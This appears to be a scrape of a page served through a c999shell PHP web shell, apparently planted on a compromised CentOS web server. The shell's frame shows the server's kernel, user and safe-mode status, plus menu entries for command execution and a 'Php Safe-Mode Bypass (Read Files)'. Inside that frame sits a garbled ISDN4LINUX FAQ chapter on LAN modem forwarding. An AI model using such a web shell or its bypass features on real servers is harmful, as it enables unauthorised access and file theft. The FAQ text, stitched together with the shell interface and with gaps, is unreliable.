Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/isdn4k-utils-3.2/ drwxr-xr-x |
Viewing file: i4lfaq-9.html (7.79 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | 9. lan: ISDN4LINUX in a LAN9.1 lan_config: How can I set up Linux so that other computers in my LAN can access the internet via my Linux computer?There are several possibilities:
9.2 lan_modemserver: How can forward ISDN data from a local computer in my LAN to the ISDN card(s) in my Linux PC (like a modem server)?On the Linux PC you have to install a forwarding server.
One option is to use #!/usr/bin/perl select((select(STDOUT), $| = 1)[$[]); select((select(STDIN), $| = 1)[$[]); exec "cu","-E","''", "-l", "$ARGV[0]"; die "$0: Cannot exec cu: $!\n"; It has to be started by inetd, therefore this has to be added to /etc/services :
modem 20006/tcp modemd # Modem service via TCP isdn 20007/tcp modemd # ISDN service via TCP And this has to be added to /etc/inet.conf :
modemd stream tcp nowait root /usr/sbin/tcpd /usr/sbin/modemd ttyI5 Instead of modemd you can also use the program Additionally, you need some software on your non-ISDN computer which emulates a serial port, but redirects it via telnet to the Linux ISDN computer. Some telnet clients allow this functionality (e.g. some uucicos). If you generally want to offer all applications a kind of "remote COM port", then there is COMT for Windows (95), and "telser.device" for Amigas. Disadvantage of COMT: it is only visible to ancient 16bit Win applications, and not even working in the DOS box. Another program is DialOut/IP, but it's fairly expensive ($70). COMT may be found on Simtel:
DialOut/IP can be found on:
Those who just want to save their CrossPoint installation should be aware that
it now offers tcp modem support, such that it will run without additional
software. Check out:
9.3 lan_remotedialing: How can I allow the users in my LAN to trigger a dial out via the ISDN card(s) in my Linux PC?For this you need two pieces of software. At the computer where the ISDN-line
is connected you need to install a
Next Previous Contents |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.014 ]-- |